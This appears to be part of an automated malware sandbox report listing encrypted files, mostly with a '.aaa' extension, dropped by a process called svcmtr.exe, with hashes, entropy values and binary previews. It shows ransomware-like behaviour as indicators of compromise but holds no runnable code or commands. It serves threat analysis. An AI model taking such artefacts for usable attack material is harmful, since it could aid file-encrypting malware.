                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...$_U|.X..^. [r..9...6c.(4OIR.!...L.!.~.e....f..d...........$...gB.......*D..(..`.p...oif..O..s.._..ljd#..y."6..s..O....'..`..$MGidNN...;...t......%J.........W.9~......Bt......M..S.%6.~.5s69.Z.{ .}..;N.$.*S...}D]....-.p.j.....$...B..d..ml...e&e...p..A.....`'w.E%38".Fw.K8.t9..2....[......ew....I..-v.j...}q.i.t.&.L.I...G.f.xj. )5...C.vp..F`..40....".I.0.(..D..v_3?......!...n..Hu......mR...L.7..V.....K.l.^..u.#.p.PVL.)...t.........1ZhC.:..9"9b..a.....Wn.L.d....B.Q....xv..t....g..P.}^i.[.alE..2.,..u....cu9.N.]...mQ...y.?>f.X..n......^y...b[.0N.........M.....f...F.N..=.h...i...

                                                                                                                          C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\Ringtone 05.wma.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):112782
                                                                                                                          Entropy (8bit):7.998677666438719
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:IgHP0BNzrPhTHNUx+bG8wGOdMqYRK3ibtarQD:8NzrZTtTk5iBqQD
                                                                                                                          MD5:6F55A572F1094DB3F8B9514286E13AAA
                                                                                                                          SHA1:FF9D23673B0942AA35174420F1ECEAE45E19C0F7
                                                                                                                          SHA-256:6D9A58D3C6C690C94161A058D7CFA6746AF9A1C20F677232707ACC61947A0401
                                                                                                                          SHA-512:C98C8F53B185AEC9C0B3957008699DF62E14CE01AD352D6638B0B3B21D55A084BAE6AC1A6DE4A8C86917CCF3B5071629F8FA7BD3A734441678B46670CD390514
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...l..h..`........[...y....mCKmZrV.... .}......GE...9..S..vJ.*.>S...'8Or..X.Z.}.x...ax..g..^..H..D.i.V*...Y.......K..#.?..3.g;.P^..XV.6.*.h.$....g...{..9oo...gQ{.N.d...S....Wey]T.....~.w..W.a.M.).-r.J.\..Fc..!..&w....AR\..w~......{.@9.P.x.7..?&.J...;nP>..u...(..cM.;....}.J.......o.:"...i..w.1.....,.V.....T"=..UR..AI@....r..f..K6K:'...{T...1bh....Z..v~.R......&.B.v...tf....~.......B.R........i....b..C,..d...Q..v...9lK. *.d..`9.9^..B....c.r.z....&.u.|=u...0h.1*.oA)jl.cXV.G.g....\..v.Ee.j.].k........4.M/.@..n..S6...{'{..:......a..{.;.].|..."){.'...q..i.u..&....4n5b*k...G..

                                                                                                                          C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\Ringtone 06.wma.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):94878
                                                                                                                          Entropy (8bit):7.9980371289190595
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:VXe0033wVR6+Yi+qkoqEKDlKH7hb35MWTAmHpeI086c349ONHxGX/kfdTB4hv/YM:VuPn+0VivkHKZnx086f9ONHK/MBov//J
                                                                                                                          MD5:04A505AAE0DE54D383A2864C42ABF83B
                                                                                                                          SHA1:3ABE2BC6E2E127D61842614985AD80B662287896
                                                                                                                          SHA-256:73CF7FD7EB0EC82788AC290D39DB00181A7E01DD21C8B122D5D5B9051526436D
                                                                                                                          SHA-512:A31780406631D592E1E01A8EBF3EB5415F1F3AAD07F04A16817996F31878F5A1D6169AC9AB18120C565D22D3478B36073074989DD062B926FD41139F9CAACEE3
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...e. ....,1...A..p...8...7,8.N>..m..K..9.Z..}..x..%!Z. ..A.+@&.......:....&uS.*.l....Gc2...j..n.A....D.....7...9....M."CkyC..F....,cG....v.' l.....%f.....0=6B/|.c...x..)w5.........L.;..$e......:....z.&r....XJ2..."..,.E......Q....U>....PF0p..E.g.....y.......r..?).....Q......<.[..r.2.....p\.C|Q..L.m.>.vO..S.jh.p8Ig.R..V...d.O8...,.$UO.. ]...PN.,.GA%....l....Q...~.{d..O......l.......[...T.?d...&..2..pb....g.G.../.f.4......{....#_.9u>Bw^...$..S...4}..6.Wq..4c..Rw.yn)7KL...._.....B3t.&I...A.;..o.9Y/....@........@T|....%'....;....u.....jK..,v...Qf.x.;.......}.rdW...x.G..

                                                                                                                          C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\Ringtone 07.wma.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):94878
                                                                                                                          Entropy (8bit):7.997887264203218
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:sii4M4pnwnv28C6yHLtK6Ph4ESaWYEb4pQI5xwJXXR08NuRknaS5wagDzo8INhV9:HnM4pwn+8CxZ1SaWYYl5hXm5SnaOrmol
                                                                                                                          MD5:A8163D261CB81067929DBE94A35AD098
                                                                                                                          SHA1:C4E5CE0656766325A8665C0A6015EB0A2664D2CC
                                                                                                                          SHA-256:DC5DDD6AB2104CE4A072A7344E54F7DC687E2C30B1E69747E11A4BC71C1006AF
                                                                                                                          SHA-512:DFB65AE0819FB30EFFD20524E8F43900ED743B2CF71A0788DECCA7AC097FF502D74EB7397B350D0543554D5BA161C4836BE5E431DFC0355DD148CA5151C14E45
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...0.4dN.b.......L.p.....Y5&..G.....4D..q.....8q..........K.?...H}/.u... ]~[....C.T.>.0..z.s1...._.wo..yl..%..>......X.qc.vb..(..&....?D6...>...uk..iqc.........O..C.....l<...)H.#o~.:.G......"........u..Z...?&v..Hj.a..D.I......i1....%..^..m.q.x.*.=."..n..V..4.{%...."x.p.%....U....=.aI.PF.......nf...gZ,.3$.b.VoO.=B.x..cB.p..}....{w..W.?~..&..........z....m...,A{.8b.T\3.U.#M^OS3)..&...}....h.;..R.W...._......y...Q.D}.6.....t.n.X.jZo.G.C.. ..>,...#*E...:/K.R@..x.E.<C..t.X.TQ...XUg>..$..l./{...:.o.D.k..$.L...,@.....9.../&<.r.....c:.....G.w..q|.../.<n.Z.@}i..y........?-`U.

                                                                                                                          C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\Ringtone 08.wma.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):139614
                                                                                                                          Entropy (8bit):7.9984534759836015
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:vh22Q3J5JRTIVgkG91y7ucbzqFQJ/fLG8KHRSz7MHpATIGP:vQjVIVKvy7ucBlfLhKEvDIGP
                                                                                                                          MD5:C492BDA69CD3F1D9EE4F0C66440A1F3B
                                                                                                                          SHA1:5C0802DB20057BDF31116A27C5939DD3B7C571B4
                                                                                                                          SHA-256:39921D8FBC985D583A162CD901C01127A6F295D23CDD870B93913FF9B86CB70D
                                                                                                                          SHA-512:AEF98D599D93A721954B7E2A981A98CAF31F95A93F5267A32510D281D1C75481CC440BEB2F5A9603E65F484844CDD3A4F861A288DC6C224973D72978167CA989
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.......)+._&..*......4@]GU.-..9+7.5y...UR......P.P....,..5?.=#9jn..Y.....B.4..0.Q.o...K<.c.Vy.z.j...A..v..b4..A...x1.C3}UW..k....+.....*.T~.H1|?.g|.....J.\H._a..&..>.......#JNBj...3.|.Ub.J.;(.y...e=.5I..J<.VJ..D4^.......l..P+.O.n.T...O..%r..~3....1.......F*?N?...!.y.8.9"g..Y:I.%K.h.C.z..o.@@..x...J.._7...c.'..|...;0X.&usx....,.s...a.k.kb.1?. .hL...k.z..%.f.....r.b....0?H..|..M....J...e..U...,....$7/...GT`...H..F{.......6r..p]..^..c..Q.2.0..7.j.*.....%.1..L..e.S.Q........N.F.-|.....Ji^ .[.@$M..~...l..+...5...`...$s.O...m.x.Y.....&.....}~..$;.$bf.....J.X.w+s.~.~..5..W.....&....

                                                                                                                          C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\Ringtone 09.wma.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):112782
                                                                                                                          Entropy (8bit):7.998461573117077
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:u3FTY8yOyHyG/k1quwoC3HzvfZXUhdipshyzIKtTKKnNuw4V8g+AJK3L9I3QAGcf:u1TxyFz/jU4HbW0psWpNdYoOKb9xncqu
                                                                                                                          MD5:759EEF7B3674F7598D102B009F80784D
                                                                                                                          SHA1:8DE5077188531546069A338F08E62312CA80B428
                                                                                                                          SHA-256:4509D90F70464C9676E1BDBD46F4AA67930093110D43554369B9F61BD2F13F4C
                                                                                                                          SHA-512:01D2C20D5620056B1615ADC3572EA576A7C077CE54080F274B0CB44C4E8D16A014B2156CE59178EF2B1EED6D35722BA4813ECD60E864AA1DBA763E18E7D57708
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....L~.U.B....aB......or..2.K_~.DS..E.....$_..|V..&..ya.[...... .@!.o..-.Xpo.\..F>.#:Qo<P..P+j....bIjIB7...D.....?+#'......%..p.....\.C}f....*5J|...n._d+.v.*.n.x.|GX.8....=...H..9.v:"..7..s..`$....zk#m..C&h3..Q...(F.6C...b...?(..=...#d.....~...W.q3N<.eDj..^......V`..w..%.AA..2....}Z5a.@4_..E.......+......!"'W).;.nJ.%7....*....6"...#C.........QR.Z.wK.m.>.o.S.#-..N..J......Y.S..5E.......$ ..7.{.O..6../3q..t..6..)...j..V..jc.9../.....l.......^.?R....v._2..G5..*....G\....U...~`....k7.....RG.h...t........s.+.."\."avS.....B..$.f"g.J..=w..6.G..*.=.M.r...].d.*...}...*...."......

                                                                                                                          C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\Ringtone 10.wma.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):94878
                                                                                                                          Entropy (8bit):7.99809516643394
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:VcQ+4MY/mJtprGgbIkJ759IK22DGjjyD2jvRvD8SDmDs5HReTyWkDMvbt:VmlIrEbxfDj2ZjDDHETADu
                                                                                                                          MD5:0CD36C25DB63B55810F524E8FAA406EC
                                                                                                                          SHA1:49E3A02EE8CD437620DC0E5C855430B0697C45F3
                                                                                                                          SHA-256:511D8D70ED9CC9E6CBF5476FA3B79CD9417BA35780CD02C5FBB9251AF98771CA
                                                                                                                          SHA-512:F1D58D87CC940DB6BF5AFE06AB4F5FB40597357E93A7D40FC9C2A76136F55279E2CCE6A2222628B51A5971D975D2F4178D52C3030D4272FD392528082EDCA200
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....L^."..4nka.;IT.p..O@.....H...N(\......`..f...?.L.B|.W.2/U...E......)~...K..K.vY..V<../.D.(....6.:.."..{.FX...B..h..\vo...T>S.`..U.......>..[F..2.]........^....B..L..j1hg.D..w.3.j..$..a.....X....FB...y.S.P}....=.Q..~`...+B]'6D5M...n.2{.(...B..WL..b\.S.;..c.QC.n...+#/......v...=.*".U.~i...[V.>tq...K....D1*......AR>...q..t...r.Q..h-3.*...........".D[..8...-v.\..Dg...../9Q..k..+^.x].*ku.z.?..zq4{..d........xoJK.<q:.MV.-....?.C.,/H0._RCjz.........3......~.x....W4k.k.6...x.q..r. .+j....w........}L.*.....2.rv..9....@.....6...CX..a.T..p.\......u.1.`...g=.k[8....2K...q..........?{!V..Y.LQ

                                                                                                                          C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Pictures\Sample Pictures\Chrysanthemum.jpg.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):879822
                                                                                                                          Entropy (8bit):7.999783565202353
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:24576:56jGwk4eMjnsZbcdSzjiV8ZptChrFwwXZKyHQ6M:MX79zsZbcMIowrKOmX
                                                                                                                          MD5:98D1DD45E84C2277FAD0EB8368A2CE0A
                                                                                                                          SHA1:82C9691BB6AEE61B8025EDD6E25082BFA0C6D8A4
                                                                                                                          SHA-256:8B4D65308DAAD24E20D4433595867D645C5BC64F8EF1D4B069FE8ABDACE4DBA8
                                                                                                                          SHA-512:3040B0E653477EF46457EFB9B8509F606D25584EE2980722FE2146FA8FF8BABC540200B03D5046C4E558853E7A61DBB574EDA9DB98FE4CEE6690A791B7B63A58
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..>!.(D..t0>.9.._"k...*.0Msx.K.E.,\..=..c.........1.f..V....J.X.0...Xf.<P.1R.S.BC...L.?..6.$\....7...Ss.D..C.1..n.wm..9.9?.m.:..NW.g.g..}../n9.}.6A..w.X.......zy..}$..q..W}'d;)..~X..)D..*9.C.p..A....\r}..$..X.....i.....T5...:Z..{....b....P......?.~m..9.\.Jg&ii!...K_eZ.. ..-.'9v..p..]vz...1.z..h.ow.;!.....M...DT..z......^.yA.8.R.#....jS..M..$...2.(....r.D..D...._.[z<..X.-X.......F.#c..G..o..x.#...3Is..$..(8..cA3f.....F.mz.~......m...5.*..X.\....H.........J.j.BnV.....w.....k+p.*A7...U.E..o..J.dq<.Y.@...e..D<..U..._............o:...E..`..A....\..6..k29......N.TA.F...a.......

                                                                                                                          C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Pictures\Sample Pictures\Hydrangeas.jpg.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):596126
                                                                                                                          Entropy (8bit):7.999628599330229
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:oEcuRGrVjPy7PM2q+xCorpiDwhQV6Nb3HIDFKubFZ2vuQzgYx:TcuRwVjPyzMxrOpiDwhpNbeFxI
                                                                                                                          MD5:C29B66447212572A9F0ACF11D2DB0229
                                                                                                                          SHA1:E55C867AE6B8B28FB1895E45D1606062F53C06F5
                                                                                                                          SHA-256:205BE3BE3BEC79F058B746ACB7D9C5C6B5DF6A7238ED31F16E5805BBC9FE050A
                                                                                                                          SHA-512:6E131BA63E6E8C77A981301F20E78384A99C73B53D7D3050D48B92356C0449D6972DEC1D571E64C747AC008D196E37574BD5E3A34ECFD3B41F197F0DB8C7EE0F
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....3QwgR3.@..]..................6*....:^.O..9...G...._ >.6.$..d......>.....|.l6)...Y.{Jx.....3....%...c.9).:..R...$E.W.......5.dN.,.L/...Ua..[.f.......#,....f...W...."...9C.m..".....>AJ.E.....p.WN.[=....b....g.......g.Z..::.....=ao8g..@.q..J_o6.H..7".c.;.j..,]....U.u9f!W.a...%.6...Y/.....7|..Om.Q..y.....u.5...F....p..k........;...~0.%.,.m....E...n.Me..Pi...6bN..}~.....O.8..i.m....O(.H~.(g..m...8.>l'.p..Y...z.....!..rC..z.L......88....0`..."....|.$m.$XJ..l..k.0..E(.....,..T..G.@.A]........iz).?w1.@ .......=./'...h........@._",.......pYm...&Z...Qn..8:^.#.Y.V.%.d..*.w.....

                                                                                                                          C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Pictures\Sample Pictures\Jellyfish.jpg.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):776542
                                                                                                                          Entropy (8bit):7.999757453156257
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:idKFI8B65Kr43g/B38bUiZT4oC6zyZWdnU4jYAzrasCC1lnkpxLn8ymD6Pnuaxtf:jIk4utSUiVk2yZWtU4jYAf31JkpxLRzx
                                                                                                                          MD5:BC5C99A91004E1E4FEFB21A10DFC9539
                                                                                                                          SHA1:E618E84817C835D02CABCEFFD5DB44C5D4C007B9
                                                                                                                          SHA-256:B3D8FF8168DFDDC6204F70E310A778AF13EA509BF9B1AEFF059D35BD15E1441D
                                                                                                                          SHA-512:9B05A6260C18779C0ACDC78BE379C0B05794CDA2BFEA48FBE6493E4076079FAB562FD0F652519CF613227BD687A6971E7535EADFEF48F6A9F2350357BFDBFF53
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..H.kc....n.............6x.B......q...t+....... .....p...c-..v.by..mk.D.bc.^.A.M.z.|....."...Q.....{9]ZL@.Z..i.^.-....8.Y[b.L..wa[>>%b.......[.N..a{}A..V.... ..v+..........o|..\..#_....+.....<.....u....o7.x....0nU..+...0...'......../5...f.M...Wn.Q..U...."?....G... ....cn.J...jE.vNP...\3Qt.n.t...z...Z..C..)...pud6.6.MHpW.5.CI........?\........RN.l.JP.....tC.VU.."%:q.f...{..>.jR.*~.G.uX.........e.....I.+..n\%.Boy..N.;.p........^..n.5. .|..4..8l.....=.,..7.~.3.....(.8).fz~=.p?.*6...0.x...Bw'...f...2...n..A....@^.x.y>zK...eC..(.^.l.vl^....7....*#.8.;%.0U.....a..r..Y....l*.l.s

                                                                                                                          C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Pictures\Sample Pictures\Lighthouse.jpg.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):562110
                                                                                                                          Entropy (8bit):7.999634521097577
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:FyGp41iRFEWOg9WFDxziFy9C6Jn+nrvQYSunCnQcHvzJz8GQXfv8G:Fy241euYUFDNic9Czro1QHh
                                                                                                                          MD5:C50F1D1AE37CAC1671FAC9712AA9E0A4
                                                                                                                          SHA1:5A8176A1A84E7D3945D5AB8F65A64FAB0CFE5366
                                                                                                                          SHA-256:419DFC785D372006C4F5081E2E13984F5CFB329EC9755C52524B598D4B8BAD28
                                                                                                                          SHA-512:59A87153AD051A4A1FFE28C47AF9024AAC74B6EF36C1A417EB484CE7C6A5269AA7E6FBA3E657311D9A04CC562B7209BAC480B8F96205C5B2A989C17974816DDC
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..Z.&N.X..h..............`/.1.6...LL.P.6.S.!S-| ....-w.q.-..j.g...]%.Rgl.w.Fq.k..I.tuD..+y;.t..].W.,m..<|../..Op..^H..4.. 8..r....._m.....^....e.W[5.J...nq1......n..5..#..61....Q.C...).../ ....P5....G./]1....s......T.i{1}.=.n...zE.p.e`Jj.. =....x..H.U.f8..I..O.&..@.H.P]."..k..R.$i1..T.....`D..8.R........./........%V0~'....'.[.B..A.=...h...[.<a..:.vQU-S.....-.LR..E..s.....*.*.'......s.e.Q....&3c..#....uC...<..).M.-I..&..;....~.<..j.8...............E..sD+..`_S.d.0>.........{.....w|....lN......+.eX.....I..k5M...}....e.Z..Fw....W.C..FU...M..]}...k."........Q!.)

                                                                                                                          C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\My Pictures\Sample Pictures\Penguins.jpg.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):778670
                                                                                                                          Entropy (8bit):7.9997883961911445
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:AJhQRt/1MQJfwUL3pPOO8rpzpkuvHQuj9jEEkW2apGWnYLEd0An3L+yCtc5r:QQzWslzpJ8rpz66j9wEkxmG3LEd0G36S
                                                                                                                          MD5:B1EA50F874E0B9DB9A7ADD1DD86A3B34
                                                                                                                          SHA1:A7A7E49BCCE680D0FF5C940E9584C308B6D05128
                                                                                                                          SHA-256:ACC54ACE830C307BABCF47B108685425CFF3285F30E193D4315E37F816BCEB8E
                                                                                                                          SHA-512:22F32BDB3C3E6C717C5689E0E4D223E0AC4F3B123E122F292826F686417DED6C70AD75B79995260164434780B6A13D53E83D6159706E597E51EAA519EE0BA1EF
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..^../a."..?..r.F*......D%.....lp..z.X./.sR..k...)g..DV....,_..#J....k..F..3(...f..b+.\S.B...E{....b.}a..|e.. .Y,.lIh+IX..b..?..@O..Z.e.....l..#..O.p...".2.i.S.fd#......n..A+..O.1.Vu,..........}9.nc7.&............8J..ek.XzW8...5O&..........LP):.Z.kS...n...3....Yh..z...........M.z..].)...4c .6....x._s.ho.t.v2.G;Qbt...X......w...K..;....n.5.1xF...+\T./...c.O.......}.cr<.....\.FQ.l.5.F(......hL...qFn.K...1;..J.s.O..0.r4...QX...P..~..$..yj..$....#".rA....9..c2j..%?<.R.X.\3.Y-.....>.....A........8..V ....s..H..v<s..h...v.h..c.{y.....h.x%...!0O.-.O.>q....N<....M..O..$.

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32670
                                                                                                                          Entropy (8bit):7.993974679204377
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GYskjUBMsFLR9gyow/2orrqovrLcFQeWW6POd:ekj+MsTDoxo/WFXd
                                                                                                                          MD5:B2557DB402C3224A6C20FA9B15B1F72D
                                                                                                                          SHA1:D1756B5D91A7684B987F6F115D12C4C280C71614
                                                                                                                          SHA-256:C6CE5839C100EF241A7F4B142B9359776043AA9748E37060533D9FC7F59F9CF4
                                                                                                                          SHA-512:C9745A564FF8258CDBB17D174287F96982D7CAAF1183A93A25A53FFA65AA53C13E0434890343004C2595B19C70031C3FED7870EB4E7CD25ECC4151229517825B
                                                                                                                          Malicious:true
